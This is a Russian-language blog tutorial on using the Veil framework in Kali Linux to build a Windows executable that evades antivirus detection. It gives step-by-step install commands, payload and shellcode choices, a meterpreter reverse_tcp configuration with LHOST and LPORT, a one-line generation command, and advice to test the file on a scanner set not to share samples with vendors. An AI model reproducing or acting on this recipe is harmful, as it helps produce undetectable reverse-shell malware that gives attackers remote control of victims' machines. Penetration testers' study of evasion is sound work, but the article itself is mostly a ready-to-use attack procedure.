Рейтинг@Mail.ru

Kali Linux: Обходим антивирусные программы с помощью Veil

: в разделе: Open Source
12748

обход антивируса

Veil это удивительный инструмент, разработанный Крисом Транкером @ChrisTruncer, Майком Райтом @TheMightyShiv и Grayhound'ом @the_grayhound, специально для Кали Linux с целью:

  • Обходить антивирусную защиту
  • Получать полезные данные в рамках Metasploit
  • Создание функциональной части вируса т. н. payload

Хочется поговорить о Veil и привести несколько примеров о том, как обойти несколько антивирусных программ. Основные изменения в последних версиях Veil:

  • совместимость x64 — Обновлен скрипт установки для того, чтобы Veil был совместим с x86 и x64 платформами.

  • Функция обновления - Теперь Veil имеет функцию обновления. Теперь мы можем обновить Veil либо из командной строки или из меню.

Чтобы установить Veil в любой среде, вы можете использовать следующие команды:

wget https://github.com/ChrisTruncer/Veil/archive/master.zip

unzip master.zip

cd Veil-master/setup

cd ..

./setup.sh

Чтобы установить Veil в Kali, выполняем следующие команды:

apt-get update

apt-get install veil

После того как Veil будет установлен запускаем его из командной строки:


./Veil

Далее на экране мы увидим что-то вроде этого, загружено 18 payload'ов:

вводим use в коммандную строку

Veil1

Теперь Veil предлагает нам выбрать тело вируса с которым хотим работать. В этом случае я выбрал python/b64VirtualAlloc набрав "18"

Veil2

Когда загрузка тела вируса закончиться, введите команду — generate. На данном этапе можно задать кучу специфических параметров, но в рамках этой статьи будем использовать значения по-умолчанию.

Veil3

Далее необходимо выбрать шеллкод, который будет использоваться, мы выбираем msfvenom набрав 1

Veil4

Далее указываем некоторые детали:

veil5

Enter metasploit payload: “windows/meterpreter/reverse_tcp“

Enter value for ‘LHOST’, [tab] for local IP: “192.168.69.69″

Enter value for ‘LPORT’: “443“

Ждем немного пока шеллкод сгенерируется

После этого Veil потребует ввести имя для итогового файла, я назвал его undetectable

Veil6

На следующем этапе выбираем Pyinstaller — 1

Veil7

После этого мы получим готовый исполняемый .exe файл в папке /root/Veil-master/output/compiled/

Veil8

Теперь, у нас есть исполняемый файл и нам надо проверить его через vscan.novirusthanks.org. Пожалуйста, не забудьте при проверке установить галочку "Do not distribute the sample".

Veil10

Ну и в идеале после проверки мы должны получить сообщение, что наш файл чист на все 100%

Veil11

Все выше перечисленные операции по созданию файла, можно проделать через командную строку, не используя меню.

./Veil.py -l python -p b64VirtualAlloc -o undetectable –msfpayload windows/meterpreter/reverse_tcp –msfoptions LHOST=192.168.69.69 LPORT=443

Удачных тестов!

0
Привязка к тегам kali Linux хак

Оставить комментарий

Гость Вторник, 18 Июнь 2019